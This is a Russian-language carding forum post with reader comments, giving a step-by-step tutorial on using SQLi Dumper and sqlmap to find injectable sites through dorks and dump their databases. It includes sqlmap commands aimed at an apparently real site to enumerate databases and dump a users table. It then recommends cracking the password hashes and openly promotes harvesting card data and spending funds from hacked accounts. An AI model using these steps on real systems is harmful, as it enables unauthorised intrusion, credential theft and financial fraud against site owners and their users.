SQLi Dumper & SQL Map

[Гость]

Приветствую, расскажу о SQLi Dumper и SQL Map.
Те, кто внимательно читал мою статью про Havij догадываются о чем будет идти речь. Если нет, то это два хороших инструмента кардера и хакера.
Вот так выглядит SQLi Dumper

Тут мы видим наши дорки, которые вы купили или откопали где-то на шару
Для начала сканирования нажимаем в верхнем правом углу Start Scanner и начинается поиск сайтов, это должно работать нормально если вы все правильно вставили. Там есть вкладка, которая называется Exploitable куда нам нужно войти после того как закончили сканирование и выбираем там Start Exploiter в правом верхнем углу. После того как закончили с эсплойтером идем во вкладку Injectable и нажимаем Start Analyzer в верхнем правом углу, после того как проанализировали клацаем правой кнопкой мыши по ссылке и выбираем Go To Dumper.

Затем произойдет магия сама по себе...
Нажимаем на базе данных и нажимаем Get Tables

Прогрузились наши таблицы, у меня выпало 31, выбираем нужную нам и нажимаем Get Colums

Случится другой фокус и программа дала нам 34 колонки, теперь чтобы получить и сохранить необходимую нам информацию на наш кампутер, выбираем нужную нам колонку и выбираем Dump Data

Круто?

Идем дальше, успеваете?
SQL Map
Идем в командную строку и в раздел SQL Map

Вводим эту команду
sqlmap.py -u http://www.chickency...ndex.php?cat=32 --dbs
Проявите немного терпения пока процесс закончится

Теперь, чтобы получить таблицы для той базы данных вводим эту команду
sqlmap.py -u http://www.chickency...ndex.php?cat=32 --dbs -D chickenc_dbchicken2 --tables

Должны отобразиться таблицы, выбираем ту, которая нас интересует и колонки которой мы хотим получить и вводим эту команду
sqlmap.py -u http://www.chickency...ndex.php?cat=32 --dbs -D chickenc_dbchicken2 -T tblusers --columns

Должны появиться колонки. Теперь чтобы сдампить(получить/извлечь) нужную нам инфу с колонок пишем эту комманду
sqlmap.py -u http://www.chickency...ndex.php?cat=32 --dbs -D chickenc_dbchicken2 -T tblusers --dump

Вот эта инфа, это криптопароль, я думаю sha1 и советую заюзать HashKiller для декрипта
Для поиска админки python скрипт:
ССЫЛКА


Затем нажимаем Enter и должен пойти поиск специфической директории

Все, пошел процес сканирования

Выглядит все сложно и сыро, понимаю
Но стоит немножечко посидеть и вникнуть в это все, так сразу все написанное выше покажется вам легким и понятным. Так же не забывайте, что при правильном подборе дорков можно добывать картон, аккаунты к разным сайтам в которых есть внутренние кошельки и траааааааатить их
Всем удачи и экспериментов
Специально для ссс.mn

[Гость]

залейте софт

[Гость]

ещё и софт подавай))))и так всё подано на блюдечке)))))

[Гость]

тема сыра особенно про дампер...не ,так то ТС правильно всё рассказал,но многое не учёл в том числе и настройки,что не мало важно для нормального парсинга и слива БД с сайта!!!!Про криптопароль типа он sha-1 я лучше промолчу в голос,это не sha-1!!!!Данная тема актуальной будет всегда,тек кто парит в написании дорок как я допустим,неплохо пользуются данными инструментами)))

[Гость]

хорошая статья, автору респект!

[civatateo 0]

Благодарю за статью,многим будет интересно,но информации которой я не могу найти так это про вкладку Tools & Settings ,что там можно настроить как сделать лучше ?Буду рад услышать любые советы,спасибо!

[Гость]

Хороший мануал спасиб! У меня проблема дампер не ищет не одного сайта сканит и не находит винда 10 в чём может быть проблема кто знает?

[Гость]

SQLi Dumper на 10 винде не работает ? у меня не ищет нечего!